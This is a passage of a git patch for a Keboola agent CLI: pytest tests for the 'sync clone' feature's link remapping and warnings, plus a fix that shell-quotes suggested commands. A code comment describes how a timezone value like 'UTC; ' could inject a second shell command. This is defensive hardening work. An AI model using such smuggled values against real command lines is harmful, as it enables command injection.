knows.""" + variables_links = {"variables_id": "var-ref", "variables_values_id": "vrow-ref"} + values = [{"name": "limit", "value": "10"}, {"name": "#token", "value": SOURCE_CIPHER}] + return [ + _component( + VARS, + "other", + _config( + "var-ref", + "Variables", + {"variables": [{"name": "limit", "type": "string"}]}, + rows=[_row("vrow-ref", "Default values", {"values": values})], + ), + ), + _component( + SHARED, + "other", + _config( + "sc-py", + "Shared python", + {"componentId": PY}, + rows=[_row(SHARED_ROW_ID, "helpers", {"code_content": ["def helper():\n 1"]})], + ), + _config( + "sc-sql", + "Shared sql", + {"componentId": SQL}, + rows=[_row(SHARED_ROW_ID, "prep", {"code_content": ["SELECT 0;"]})], + ), + ), + _component( + SQL, + "transformation", + _config( + "tr1-ref", + "SQL step", + { + "parameters": _blocks( + ("Shared", [f"{{{{ {SHARED_ROW_ID} }}}}"]), ("C1", ["SELECT 1;"]) + ), + "shared_code_id": "sc-sql", + "shared_code_row_ids": [SHARED_ROW_ID], + **variables_links, + }, + ), + _config( + "tr3-ref", + "SQL vars only", + {"parameters": _blocks(("C1", ["SELECT {{limit}};"])), **variables_links}, + ), + ), + _component( + PY, + "transformation", + _config( + "tr2-ref", + "Py step", + { + "parameters": _blocks( + ("Shared helpers", [f"{{{{{SHARED_ROW_ID}}}}}"]), + ("Main", ["print(helper(), '{{limit}}')"]), + ), + "shared_code_id": "sc-py", + "shared_code_row_ids": [SHARED_ROW_ID], + **variables_links, + }, + ), + ), + _component( + EXTRACTOR, + "extractor", + _config( + "ex-ref", + "Orders [daily]", + { + "parameters": { + "db": {"host": "db", "#password": SOURCE_CIPHER}, + "legacy_token": SOURCE_CIPHER, + "#plain": "hunter2", + }, + "authorization": { + "oauth_api": {"id": "123", "credentials": {"#data": SOURCE_CIPHER}} + }, + }, + rows=[ + _row("exrow-1", "orders", {"parameters": {"table": "orders"}}), + _row("exrow-2", "items", {"parameters": {"table": "items"}}), + ], + ), + ), + _component( + DATA_APP, + "application", + _config( + "da-ref", + "My app", + { + "parameters": { + "id": "99999", + "dataApp": {"slug": "my-app", "secrets": {"#API_KEY": SOURCE_CIPHER}}, + }, + }, + ), + ), + _component( + FLOW, + "other", + _config( + "flow-ref", + "Template flow", + { + "phases": [{"id": 1, "name": "Step 1", "next": []}], + "tasks": [ + _job_task(10, "sql", SQL, "tr1-ref"), + _job_task(11, "py", PY, "tr2-ref"), + _job_task(12, "sandbox", SANDBOX, "sbx-ref"), + { + "id": 13, + "name": "notify", + "phase": 1, + "task": {"type": "notification", "recipients": []}, + }, + { + **_job_task(14, "orders", EXTRACTOR, "ex-ref"), + "task": { + "type": "job", + "componentId": EXTRACTOR, + "configId": "ex-ref", + "configRowIds": ["exrow-1"], + "mode": "run", + }, + }, + ], + }, + ), + ), + _component( + ORCH, + "other", + _config( + "orch-ref", + "Legacy orchestration", + { + "phases": [{"id": 1, "name": "P1", "dependsOn": []}], + "tasks": [ + { + "id": 20, + "name": "sql", + "phase": 1, + "task": {"componentId": SQL, "configId": "tr1-ref", "mode": "run"}, + }, + { + "id": 21, + "name": "inline", + "phase": 1, + "task": {"componentId": SQL, "configData": {}, "mode": "run"}, + }, + ], + }, + ), + ), + _component(SCHED, "other", _schedule("sched-ref", "Nightly")), + _component( + SANDBOX, + "other", + _config("sbx-ref", "Workspace", {"parameters": {"id": "123"}}), + ), + ] + + +def _component_entry(components: list[dict[str, Any]], component_id: str) -> dict[str, Any]: + return next(comp for comp in components if comp["id"] == component_id) + + +def _with_disabled_schedule(components: list[dict[str, Any]]) -> None: + schedule = _component_entry(components, SCHED)["configurations"][0] + schedule["configuration"]["schedule"]["state"] = "disabled" + + +def _with_second_schedule(components: list[dict[str, Any]]) -> None: + _component_entry(components, SCHED)["configurations"].append(_schedule("sched-2", "Hourly")) + + +class StorageFake: + """Stateful Storage API double: every created config or row gets a fresh id. + + ``fail_update_once`` holds ``(component_id, config name, change_description + prefix)`` entries: the next matching PUT fails, once. A row whose name is in + ``fail_row_names`` fails to create. + """ + + def __init__(self, components: list[dict[str, Any]], project_id: int): + self.components = components + self.project_id = project_id + self._ids = itertools.count(1) + self.create_calls: list[dict[str, Any]] = [] + self.fail_update_once: set[tuple[str, str, str]] = set() + self.fail_row_names: set[str] = set() + + def find(self, component_id: str, config_id: str) -> dict[str, Any]: + for config in self.configs_of(component_id): + if str(config["id"]) == str(config_id): + return config + raise KeyError(f"{component_id}/{config_id}") + + def configs_of(self, component_id: str) -> list[dict[str, Any]]: + for comp in self.components: + if comp["id"] == component_id: + return comp["configurations"] + return [] + + def append(self, component_id: str, config: dict[str, Any]) -> None: + for comp in self.components: + if comp["id"] == component_id: + comp["configurations"].append(config) + return + self.components.append({"id": component_id, "type": "other", "configurations": [config]}) + + def verify_token(self) -> TokenVerifyResponse: + return TokenVerifyResponse( + token_id="tok", + token_description="fake", + project_id=self.project_id, + project_name=f"P{self.project_id}", + owner_name="Org", + ) + + def list_dev_branches(self) -> list[dict[str, Any]]: + return [{"id": self.project_id * 10, "name": "Main", "isDefault": True}] + + def list_components_with_configs(self, branch_id: int | None = None) -> list[dict[str, Any]]: + return copy.deepcopy(self.components) + + def list_config_folder_metadata(self, branch_id: int | None = None) -> dict[str, str]: + return {} + + def set_config_metadata(self, **kwargs: Any) -> None: + return None + + def encrypt_values(self, project_id: Any, component_id: str, data: dict[str, str]) -> dict: + return {key: f"{TARGET_CIPHER_PREFIX}{key}" for key in data} + + def get_config_detail( + self, component_id: str, config_id: str, branch_id: int | None = None + ) -> dict[str, Any]: + return copy.deepcopy(self.find(component_id, config_id)) + + def get_config_row( + self, component_id: str, config_id: str, row_id: str, branch_id: int | None = None + ) -> dict[str, Any]: + for row in self.find(component_id, config_id)["rows"]: + if str(row["id"]) == str(row_id): + return copy.deepcopy(row) + raise KeyError(row_id) + + def create_config( + self, + component_id: str, + name: str, + configuration: dict[str, Any], + description: str = "", + branch_id: int | None = None, + is_disabled: bool = False, + ) -> dict[str, Any]: + config = _config(f"new-{next(self._ids)}", name, copy.deepcopy(configuration)) + self.create_calls.append({"component_id": component_id, "id": config["id"]}) + self.append(component_id, config) + return copy.deepcopy(config) + + def update_config( + self, + component_id: str, + config_id: str, + name: str | None = None, + configuration: dict[str, Any] | None = None, + description: str | None = None, + change_description: str = "", + branch_id: int | None = None, + is_disabled: bool | None = None, + ) -> dict[str, Any]: + config = self.find(component_id, config_id) + for key in list(self.fail_update_once): + fail_component, fail_name, fail_description = key + if (fail_component, fail_name) == ( + component_id, + config["name"], + ) and change_description.startswith(fail_description): + self.fail_update_once.discard(key) + raise KeboolaApiError("Storage refused the update", status_code=500) + if configuration is not None: + config["configuration"] = copy.deepcopy(configuration) + return copy.deepcopy(config) + + def create_config_row( + self, + component_id: str, + config_id: str, + name: str, + configuration: dict[str, Any], + description: str = "", + is_disabled: bool = False, + branch_id: int | None = None, + ) -> dict[str, Any]: + if name in self.fail_row_names: + raise KeboolaApiError("Storage refused the row", status_code=500) + row = _row(f"newrow-{next(self._ids)}", name, copy.deepcopy(configuration)) + self.find(component_id, config_id)["rows"].append(row) + return copy.deepcopy(row) + + +class DataScienceFake: + """Data Science double: ``create_app`` also creates the Storage config, like POST /apps.""" + + def __init__(self, storage: StorageFake, apps: list[dict[str, Any]]): + self.storage = storage + self.apps = apps + self.created_app_ids: list[str] = [] + + def __enter__(self) -> Self: + return self + + def __exit__(self, *args: object) -> bool: + return False + + def close(self) -> None: + return None + + def list_apps(self) -> list[dict[str, Any]]: + return self.apps + + def create_app( + self, + *, + type_: str, + name: str, + description: str, + config: dict[str, Any], + branch_id: int | None = None, + use_managed_git_repo: bool = False, + ) -> dict[str, Any]: + app_id = f"8888{len(self.created_app_ids) + 1}" + config_id = f"da-new-{len(self.created_app_ids) + 1}" + self.created_app_ids.append(app_id) + self.storage.append(DATA_APP, _config(config_id, name, copy.deepcopy(config))) + return {"id": app_id, "configId": config_id} + + +def _wrap(obj: Any) -> MagicMock: + mock = MagicMock(wraps=obj) + mock.__enter__ = MagicMock(return_value=mock) + mock.__exit__ = MagicMock(return_value=False) + return mock + + +class World: + """A pulled reference project and an empty target project, both faked.""" + + def __init__( + self, + tmp_path: Path, + config_dir: Path, + *, + reference: Callable[[list[dict[str, Any]]], None] | None = None, + ): + components = _reference_components() + if reference is not None: + reference(components) + self.tmp_path = tmp_path + self.ref_api = StorageFake(components, project_id=258) + self.tgt_api = StorageFake([], project_id=4242) + ref_ds = DataScienceFake( + self.ref_api, + apps=[ + {"id": "99999", "componentId": DATA_APP, "configId": "da-ref", "type": "python-js"} + ], + ) + self.tgt_ds = DataScienceFake(self.tgt_api, apps=[]) + ref_client, tgt_client = _wrap(self.ref_api), _wrap(self.tgt_api) + + store = ConfigStore(config_dir=config_dir) + for alias, token, project_id in (("ref", REF_TOKEN, 258), ("target", TGT_TOKEN, 4242)): + store.add_project( + alias, + ProjectConfig( + stack_url=STACK, token=token, project_name=alias, project_id=project_id + ), + ) + self.service = SyncService( + config_store=store, + client_factory=lambda url, token: ref_client if token == REF_TOKEN else tgt_client, + ds_client_factory=lambda url, token: ( + _wrap(ref_ds) if token == REF_TOKEN else _wrap(self.tgt_ds) + ), + ) + self.ref_dir = tmp_path / "reference" + self.ref_dir.mkdir(parents=True) + self.service.init_sync(alias="ref", project_root=self.ref_dir) + self.service.pull(alias="ref", project_root=self.ref_dir, no_storage=True, no_jobs=True) + self.clone_dir = tmp_path / "clone" + + def clone(self, *, dry_run: bool = False, branch_override: int | None = None) -> dict[str, Any]: + return self.service.clone_project( + source=self.ref_dir, + target_alias="target", + target_dir=self.clone_dir, + dry_run=dry_run, + branch_override=branch_override, + ) + + def push_fresh_tree(self) -> dict[str, Any]: + """Push the reference configs into the target with a plain `sync push`, no clone. + + The tree is initialised for the target, then the reference config files + and their manifest entries (with the reference ids) are added to it. + The entries lose the reference ``pull_hash``, as a hand-written entry + has none: with one, the diff would report them as deleted on the + target (``remote_deleted``, issue #792 H) instead of new. + """ + tree = self.tmp_path / "fresh" + tree.mkdir() + self.service.init_sync(alias="target", project_root=tree) + target_manifest = load_manifest(tree) + ref_manifest = load_manifest(self.ref_dir) + branch = target_manifest.branches[0] + shutil.copytree( + self.ref_dir / ref_manifest.branches[0].path, tree / branch.path, dirs_exist_ok=True + ) + for cfg in ref_manifest.configurations: + cfg.branch_id = branch.id + target_manifest.configurations.append(cfg) + drop_source_pull_marks(target_manifest) + save_manifest(tree, target_manifest) + return self.service.push(alias="target", project_root=tree) + + def target(self, component_id: str, name: str | None = None) -> dict[str, Any]: + configs = [ + c for c in self.tgt_api.configs_of(component_id) if name is None or c["name"] == name + ] + assert len(configs) == 1, f"{component_id} {name}: {len(configs)} configs in the target" + return configs[0] + + def local_dir(self, component_id: str, name: str | None = None) -> Path: + for path in self.clone_dir.rglob(CONFIG_FILENAME): + if "rows" in path.relative_to(self.clone_dir).parts: + continue + data = yaml.safe_load(path.read_text(encoding="utf-8")) + if (data.get("_keboola") or {}).get("component_id") == component_id and ( + name is None or data.get("name") == name + ): + return path.parent + raise AssertionError(f"no local {component_id} {name} config in the clone tree") + + def local_config(self, component_id: str, name: str | None = None) -> dict[str, Any]: + path = self.local_dir(component_id, name) / CONFIG_FILENAME + return yaml.safe_load(path.read_text(encoding="utf-8")) + + +def _warnings_of(result: dict[str, Any], change_type: str) -> list[dict[str, Any]]: + return [w for w in result["warnings"] if w["change_type"] == change_type] + + +@pytest.fixture +def world(tmp_path: Path, tmp_config_dir: Path) -> World: + return World(tmp_path, tmp_config_dir) + + +@pytest.fixture +def cloned(world: World) -> tuple[World, dict[str, Any]]: + return world, world.clone() + + +# --------------------------------------------------------------------------- +# Links re-pointed by push (Phase C / Phase D) +# --------------------------------------------------------------------------- + + +def test_clone_reports_no_errors(cloned: tuple[World, dict[str, Any]]) -> None: + _world, result = cloned + assert result["status"] == "cloned" + assert result["errors"] == [] + + +def test_python_shared_code_points_at_its_new_config_and_row( + cloned: tuple[World, dict[str, Any]], +) -> None: + world, _result = cloned + shared = world.target(SHARED, "Shared python") + new_row_id = shared["rows"][0]["id"] + configuration = world.target(PY)["configuration"] + + assert configuration["shared_code_id"] == shared["id"] + assert configuration["shared_code_row_ids"] == [new_row_id] + codes = configuration["parameters"]["blocks"][0]["codes"] + assert codes[0]["script"] == [f"{{{{{new_row_id}}}}}"] + # A variable placeholder is not a shared-code row: it stays as it is. + assert codes[1]["script"] == ["print(helper(), '{{limit}}')"] + # The variables pass ran on the same transformation too. + assert configuration["variables_id"] == world.target(VARS)["id"] + + +def test_sql_shared_code_points_at_its_own_row(cloned: tuple[World, dict[str, Any]]) -> None: + # Both shared-code configs use the row id SHARED_ROW_ID: each + # transformation must get the row of its own shared-code config. + world, _result = cloned + shared = world.target(SHARED, "Shared sql") + new_row_id = shared["rows"][0]["id"] + assert new_row_id != world.target(SHARED, "Shared python")["rows"][0]["id"] + configuration = world.target(SQL, "SQL step")["configuration"] + + assert configuration["shared_code_id"] == shared["id"] + assert configuration["shared_code_row_ids"] == [new_row_id] + codes = configuration["parameters"]["blocks"][0]["codes"] + # The spaces inside the braces are kept. + assert codes[0]["script"] == [f"{{{{ {new_row_id} }}}}"] + script = (world.local_dir(SQL, "SQL step") / "transform.sql").read_text(encoding="utf-8") + assert f"{{{{ {new_row_id} }}}}" in script + assert SHARED_ROW_ID not in script + + +def test_shared_code_links_rewritten_in_local_files(cloned: tuple[World, dict[str, Any]]) -> None: + world, _result = cloned + shared = world.target(SHARED, "Shared python") + new_row_id = shared["rows"][0]["id"] + extra = world.local_config(PY)["_configuration_extra"] + assert extra["shared_code_id"] == shared["id"] + assert extra["shared_code_row_ids"] == [new_row_id] + script = (world.local_dir(PY) / "transform.py").read_text(encoding="utf-8") + assert f"{{{{{new_row_id}}}}}" in script + assert SHARED_ROW_ID not in script + + +def test_orchestrator_task_points_at_target_config(cloned: tuple[World, dict[str, Any]]) -> None: + world, _result = cloned + new_sql_id = world.target(SQL, "SQL step")["id"] + tasks = world.target(ORCH)["configuration"]["tasks"] + assert tasks[0]["task"]["configId"] == new_sql_id + assert "configId" not in tasks[1]["task"] + local_tasks = world.local_config(ORCH)["_configuration_extra"]["tasks"] + assert local_tasks[0]["task"]["configId"] == new_sql_id + + +def test_schedule_target_points_at_target_flow(cloned: tuple[World, dict[str, Any]]) -> None: + world, _result = cloned + new_flow_id = world.target(FLOW)["id"] + assert world.target(SCHED)["configuration"]["target"]["configurationId"] == new_flow_id + local_target = world.local_config(SCHED)["_configuration_extra"]["target"] + assert local_target["configurationId"] == new_flow_id + + +def test_flow_task_config_row_ids_point_at_target_rows( + cloned: tuple[World, dict[str, Any]], +) -> None: + world, _result = cloned + extractor = world.target(EXTRACTOR) + orders_row_id = next(r["id"] for r in extractor["rows"] if r["name"] == "orders") + task = next(t for t in world.target(FLOW)["configuration"]["tasks"] if t["id"] == 14)["task"] + assert task["configId"] == extractor["id"] + assert task["configRowIds"] == [orders_row_id] + + +def test_link_remaps_counts_each_kind(cloned: tuple[World, dict[str, Any]]) -> None: + _world, result = cloned + # flow_task_remaps keeps its meaning: flow tasks only (sql, py, orders). + assert result["flow_task_remaps"] == 3 + assert result["link_remaps"] == { + "flow_tasks": 3, + "orchestrator_tasks": 1, + "schedule_targets": 1, + "shared_code": 2, + "config_row_ids": 1, + } + + +def test_rerun_after_rebinding_has_nothing_to_push(cloned: tuple[World, dict[str, Any]]) -> None: + # Every rebind refreshed the manifest hashes, so the tree matches the target. + world, _result = cloned + rerun = world.clone() + assert rerun["status"] == "no_changes" + assert rerun["created"] == 0 + # The warnings came from the run that created the configs, not from this one. + assert rerun["warnings"] == [] + + +def test_plain_push_of_a_fresh_tree_repoints_links(world: World) -> None: + result = world.push_fresh_tree() + + assert result["errors"] == [] + new_flow_id = world.target(FLOW)["id"] + assert world.target(SCHED)["configuration"]["target"]["configurationId"] == new_flow_id + new_sql_id = world.target(SQL, "SQL step")["id"] + assert world.target(ORCH)["configuration"]["tasks"][0]["task"]["configId"] == new_sql_id + shared = world.target(SHARED, "Shared python") + assert world.target(PY)["configuration"]["shared_code_id"] == shared["id"] + assert result["link_remaps"]["config_row_ids"] == 1 + + +# --------------------------------------------------------------------------- +# Failure paths: every broken link is reported, and a failed PUT is retried +# --------------------------------------------------------------------------- + + +def _variables_link_ok(world: World) -> bool: + configuration = world.target(SQL, "SQL vars only")["configuration"] + return configuration["variables_id"] == world.target(VARS)["id"] + + +def _shared_code_link_ok(world: World) -> bool: + shared_id = world.target(SHARED, "Shared python")["id"] + return world.target(PY)["configuration"]["shared_code_id"] == shared_id + + +def _flow_task_link_ok(world: World) -> bool: + task = world.target(FLOW)["configuration"]["tasks"][0]["task"] + return task["configId"] == world.target(SQL, "SQL step")["id"] + + +def _orchestrator_task_link_ok(world: World) -> bool: + task = world.target(ORCH)["configuration"]["tasks"][0]["task"] + return task["configId"] == world.target(SQL, "SQL step")["id"] + + +def _schedule_target_link_ok(world: World) -> bool: + target = world.target(SCHED)["configuration"]["target"] + return target["configurationId"] == world.target(FLOW)["id"] + + +@pytest.mark.parametrize( + ("component_id", "config_name", "description", "change_type", "link_ok"), + [ + (SQL, "SQL vars only", "Resolve variables link", "variable_link", _variables_link_ok), + (PY, "Py step", "Resolve shared code link", "shared_code_link", _shared_code_link_ok), + (FLOW, "Template flow", "Remap linked", "flow_task_link", _flow_task_link_ok), + ( + ORCH, + "Legacy orchestration", + "Remap linked", + "flow_task_link", + _orchestrator_task_link_ok, + ), + (SCHED, "Nightly", "Remap linked", "schedule_target_link", _schedule_target_link_ok), + ], +) +def test_failed_link_put_is_retried_by_the_next_push( + world: World, + component_id: str, + config_name: str, + description: str, + change_type: str, + link_ok: Callable[[World], bool], +) -> None: + world.tgt_api.fail_update_once.add((component_id, config_name, description)) + + first = world.clone() + [error] = first["errors"] + assert (error["change_type"], error["component_id"]) == (change_type, component_id) + assert "sync push` again" in error["message"] + assert not link_ok(world) + + second = world.clone() + assert second["errors"] == [] + assert link_ok(world) + assert world.clone()["status"] == "no_changes" + + +def test_shared_code_row_that_was_not_created_is_an_error( + tmp_path: Path, tmp_config_dir: Path +) -> None: + world = World(tmp_path, tmp_config_dir) + world.tgt_api.fail_row_names.add("helpers") + result = world.clone() + + [error] = [e for e in result["errors"] if e["change_type"] == "shared_code_link"] + assert error["component_id"] == PY + assert error["error_code"] == ErrorCode.LINK_UNRESOLVED + assert SHARED_ROW_ID in error["message"] + + +def test_task_config_row_that_was_not_created_is_an_error( + tmp_path: Path, tmp_config_dir: Path +) -> None: + world = World(tmp_path, tmp_config_dir) + world.tgt_api.fail_row_names.add("orders") + result = world.clone() + + [error] = [e for e in result["errors"] if e["change_type"] == "flow_task_link"] + assert error["component_id"] == FLOW + assert error["error_code"] == ErrorCode.LINK_UNRESOLVED + assert "exrow-1" in error["message"] + assert "'orders'" in error["message"] + + +# --------------------------------------------------------------------------- +# Warnings for what the target still needs +# --------------------------------------------------------------------------- + + +def test_warns_about_flow_task_that_runs_a_config_outside_the_tree( + cloned: tuple[World, dict[str, Any]], +) -> None: + world, result = cloned + [warning] = _warnings_of(result, "missing_task_target") + assert warning["component_id"] == FLOW + assert warning["config_id"] == world.target(FLOW)["id"] + assert (warning["task_id"], warning["task_name"]) == (12, "sandbox") + assert (warning["target_component_id"], warning["target_config_id"]) == (SANDBOX, "sbx-ref") + assert "'Template flow'" in warning["message"] + assert "task 'sandbox'" in warning["message"] + assert f"{SANDBOX}/sbx-ref" in warning["message"] + + +def test_warns_once_per_config_with_encrypted_values( + cloned: tuple[World, dict[str, Any]], +) -> None: + _world, result = cloned + by_component = {w["component_id"]: w for w in _warnings_of(result, "encrypted_values_copied")} + assert set(by_component) == {DATA_APP, VARS, EXTRACTOR} + assert by_component[DATA_APP]["keys"] == ["parameters.dataApp.secrets.#API_KEY"] + # A row's keys carry the row's path. + assert by_component[VARS]["keys"] == ["rows/default-values: values.1.value"] + for warning in by_component.values(): + assert SOURCE_CIPHER not in warning["message"] + + +def test_encrypted_values_get_advice_by_kind(cloned: tuple[World, dict[str, Any]]) -> None: + _world, result = cloned + [warning] = [ + w for w in _warnings_of(result, "encrypted_values_copied") if w["component_id"] == EXTRACTOR + ] + assert warning["secret_keys"] == ["parameters.db.#password"] + assert warning["unencryptable_keys"] == ["parameters.legacy_token"] + assert warning["oauth_keys"] == [ + "_configuration_extra.authorization.oauth_api.credentials.#data" + ] + assert "--secret PATH=VALUE" in warning["message"] + assert ( + f"kbagent encrypt values --project target --component-id {EXTRACTOR}" + in (warning["message"]) + ) + assert "kbagent config oauth-url" in warning["message"] + + +def test_plaintext_secret_in_the_reference_is_not_reported( + cloned: tuple[World, dict[str, Any]], +) -> None: + # Push encrypts the plaintext for the target and writes the ciphertext back + # to the local file; that is not a value copied from the reference. + world, result = cloned + assert world.target(EXTRACTOR)["configuration"]["parameters"]["#plain"].startswith( + TARGET_CIPHER_PREFIX + ) + keys = [key for w in _warnings_of(result, "encrypted_values_copied") for key in w["keys"]] + assert not any("#plain" in key for key in keys) + + +def test_warns_that_data_app_is_not_deployed(cloned: tuple[World, dict[str, Any]]) -> None: + world, result = cloned + [warning] = _warnings_of(result, "data_app_not_deployed") + app_id = world.tgt_ds.created_app_ids[0] + assert warning["app_id"] == app_id + assert f"`kbagent data-app deploy --project target --app-id {app_id}`" in warning["message"] + + +def test_reports_schedule_as_not_active(cloned: tuple[World, dict[str, Any]]) -> None: + world, result = cloned + [warning] = _warnings_of(result, "schedule_not_active") + assert warning["active"] is False + assert warning["config_id"] == world.target(SCHED)["id"] + flow_id = world.target(FLOW)["id"] + assert f"--flow-id {flow_id} --cron '0 3 * * *' --timezone UTC`" in warning["message"] + + +def test_disabled_schedule_hint_keeps_it_disabled(tmp_path: Path, tmp_config_dir: Path) -> None: + world = World(tmp_path, tmp_config_dir, reference=_with_disabled_schedule) + [warning] = _warnings_of(world.clone(), "schedule_not_active") + assert "--timezone UTC --disabled`" in warning["message"] + + +def test_two_schedules_on_one_flow_get_no_command(tmp_path: Path, tmp_config_dir: Path) -> None: + # `flow schedule` updates the first schedule of a flow, so it could update + # the wrong one: the warning points at the UI instead. + world = World(tmp_path, tmp_config_dir, reference=_with_second_schedule) + warnings = _warnings_of(world.clone(), "schedule_not_active") + assert len(warnings) == 2 + for warning in warnings: + assert "kbagent flow schedule --project" not in warning["message"] + assert "Activate these schedules in the Keboola UI" in warning["message"] + + +def test_branch_clone_hints_carry_the_branch(tmp_path: Path, tmp_config_dir: Path) -> None: + world = World(tmp_path, tmp_config_dir) + result = world.clone(branch_override=777) + [data_app] = _warnings_of(result, "data_app_not_deployed") + [schedule] = _warnings_of(result, "schedule_not_active") + assert data_app["message"].endswith(" --branch 777`.") + assert " --timezone UTC --branch 777`" in schedule["message"] + + +def test_dry_run_reports_the_same_warnings_without_pushing( + tmp_path: Path, tmp_config_dir: Path +) -> None: + real = World(tmp_path / "real", tmp_config_dir / "real") + real_result = real.clone() + dry = World(tmp_path / "dry", tmp_config_dir / "dry") + dry_result = dry.clone(dry_run=True) + + assert dry_result["status"] == "dry_run" + assert dry.tgt_api.create_calls == [] + + def kinds(result: dict[str, Any]) -> list[tuple[str, str, list[str]]]: + # Push warnings (none here) only exist for the real run. + return sorted( + (w["change_type"], w["component_id"], w.get("keys", [])) for w in result["warnings"] + ) + + assert kinds(dry_result) == kinds(real_result) + # The tree still carries the reference ids, so no command names an id. + messages = " ".join(w["message"] for w in dry_result["warnings"]) + assert "--app-id" not in messages + assert "--flow-id" not in messages + + +# --------------------------------------------------------------------------- +# Helpers +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + ("text", "expected"), + [ + ("{{old}}", "{{new}}"), + ("{{ old }}", "{{ new }}"), + ("a\n{{old}}\nb {{old}}", "a\n{{new}}\nb {{new}}"), + ("{{limit}}", "{{limit}}"), + ("{{older}}", "{{older}}"), + ], +) +def test_rewrite_shared_code_placeholders(text: str, expected: str) -> None: + assert rewrite_shared_code_placeholders(text, {"old": "new"}) == expected + + +@pytest.mark.parametrize( + ("component_id", "task", "expected"), + [ + (FLOW, {"type": "job", "componentId": SQL, "configId": "1"}, (SQL, "1")), + (FLOW, {"type": "notification", "componentId": SQL, "configId": "1"}, None), + (FLOW, {"componentId": SQL, "configId": "1"}, None), + (ORCH, {"componentId": SQL, "configId": 7}, (SQL, "7")), + (ORCH, {"componentId": SQL, "configId": ""}, None), + (ORCH, {"componentId": SQL, "configData": {}}, None), + ], +) +def test_task_config_ref( + component_id: str, task: dict[str, Any], expected: tuple[str, str] | None +) -> None: + assert task_config_ref(component_id, {"id": 1, "task": task}) == expected + + +def test_shared_code_row_under_another_config_is_unmapped() -> None: + # The only created row "row-1" belongs to another shared-code config, so it + # must not be used, and the link reports the row as unmapped. + link = _resolve_shared_code_link( + {"shared_code_id": "sc-ref", "shared_code_row_ids": ["row-1"]}, + created_id_map={(SHARED, "sc-ref"): "sc-new"}, + created_row_id_map={("sc-other", "row-1"): "new-row"}, + ) + assert link is not None + assert link.config_id == "sc-new" + assert link.row_id_map == {} + assert link.unmapped_row_ids == ["row-1"] + + +def test_shared_code_link_untouched_when_nothing_was_created() -> None: + link = _resolve_shared_code_link( + {"shared_code_id": "sc-1", "shared_code_row_ids": ["row-1"]}, + created_id_map={}, + created_row_id_map={}, + ) + assert link is None + + +# --------------------------------------------------------------------------- +# CLI: `kbagent sync clone` prints the warnings +# --------------------------------------------------------------------------- + + +def _invoke_clone_cli(tmp_path: Path, config_dir: Path, result: dict[str, Any]) -> Any: + source = tmp_path / "reference" + (source / ".keboola").mkdir(parents=True) + with patch("keboola_agent_cli.cli.SyncService") as sync_service_cls: + service = MagicMock() + service.clone_project.return_value = result + sync_service_cls.return_value = service + return CliRunner().invoke( + app, + [ + "--config-dir", + str(config_dir), + "sync", + "clone", + "--source", + str(source), + "--target", + "target", + "--target-dir", + str(tmp_path / "clone"), + ], + ) + + +@pytest.mark.parametrize("status", ["cloned", "dry_run", "no_changes"]) +def test_cli_prints_clone_warnings(tmp_path: Path, tmp_config_dir: Path, status: str) -> None: + warning = {"change_type": "schedule_not_active", "message": "schedule 'Nightly' not active"} + result = _invoke_clone_cli( + tmp_path, + tmp_config_dir, + { + "status": status, + "target_alias": "target", + "summary": {"added": 1}, + "errors": [], + "warnings": [warning], + }, + ) + assert result.exit_code == 0, result.output + assert "schedule 'Nightly' not active" in result.output + + +def test_cli_prints_bracketed_names_as_text(tmp_path: Path, tmp_config_dir: Path) -> None: + # Rich reads "[orders]" as a style tag and "[/x]" as a closing tag that + # raises MarkupError; both are names here and must print as they are. + message = "Flow 'Load [orders] daily' task '[/x]' runs a config not in the tree." + result = _invoke_clone_cli( + tmp_path, + tmp_config_dir, + { + "status": "cloned", + "target_alias": "target", + "errors": [], + "warnings": [{"change_type": "missing_task_target", "message": message}], + }, + ) + assert result.exit_code == 0, result.output + assert "Load [orders] daily" in result.output + assert "'[/x]'" in result.output From b6f1aab53e3c57c249373238d12d5e4bcdcb8f62 Mon Sep 17 00:00:00 2001 From: soustruh Date: Wed, 30 Sep 2026 09:42:16 +0200 Subject: [PATCH 2/2] fix(sync): shell-quote the values in the commands that clone warnings suggest (CLI-24) --- .../services/_sync_clone_warnings.py | 47 ++++++++++++++----- tests/test_sync_clone_links.py | 31 ++++++++++++ 2 files changed, 65 insertions(+), 13 deletions(-) diff --git a/src/keboola_agent_cli/services/_sync_clone_warnings.py b/src/keboola_agent_cli/services/_sync_clone_warnings.py index da27a435d..43e24e985 100644 --- a/src/keboola_agent_cli/services/_sync_clone_warnings.py +++ b/src/keboola_agent_cli/services/_sync_clone_warnings.py @@ -17,6 +17,7 @@ from __future__ import annotations +import shlex from dataclasses import dataclass, field from pathlib import Path from typing import TYPE_CHECKING, Any @@ -113,8 +114,8 @@ class _WarningContext: schedules_per_flow: dict[str, int] @property - def branch_option(self) -> str: - return f" --branch {self.branch_override}" if self.branch_override is not None else "" + def branch_args(self) -> list[str]: + return ["--branch", str(self.branch_override)] if self.branch_override is not None else [] @dataclass(frozen=True) @@ -342,10 +343,19 @@ def _data_app_warning(config: _ClonedConfig, context: _WarningContext) -> dict[s app_id = str(parameters.get("id", "")) if isinstance(parameters, dict) else "" message = f"sync clone does not deploy data app {config.label}." if not context.dry_run and app_id: - message += ( - f" Deploy it with `kbagent data-app deploy --project {context.target_alias} " - f"--app-id {app_id}{context.branch_option}`." + command = shlex.join( + [ + "kbagent", + "data-app", + "deploy", + "--project", + context.target_alias, + "--app-id", + app_id, + *context.branch_args, + ] ) + message += f" Deploy it with `{command}`." else: message += " Deploy it with `kbagent data-app deploy` after the clone." return config.record("data_app_not_deployed", message, app_id=app_id) @@ -387,13 +397,24 @@ def _schedule_hint(schedule: dict[str, Any], flow_id: str, context: _WarningCont f" {flow_schedules} cloned schedules run flow {flow_id}, and `kbagent flow schedule` " "updates only one schedule per flow. Activate these schedules in the Keboola UI." ) + # The cron and the timezone come from the reference tree, so every value is + # shell-quoted: a value such as `UTC; ` must not become a second command + # when an agent or a user runs the suggested line. + args = [ + "kbagent", + "flow", + "schedule", + "--project", + context.target_alias, + "--flow-id", + flow_id, + "--cron", + str(schedule["cronTab"]), + ] timezone = schedule.get("timezone", "") - options = f" --timezone {timezone}" if timezone else "" + if timezone: + args += ["--timezone", str(timezone)] if schedule.get("state") == "disabled": - options += " --disabled" - cron_tab = schedule["cronTab"] - return ( - f" To register it, run `kbagent flow schedule --project {context.target_alias} " - f"--flow-id {flow_id} --cron '{cron_tab}'{options}{context.branch_option}`, which " - "updates this schedule." - ) + args.append("--disabled") + args += context.branch_args + return f" To register it, run `{shlex.join(args)}`, which updates this schedule." diff --git a/tests/test_sync_clone_links.py b/tests/test_sync_clone_links.py index 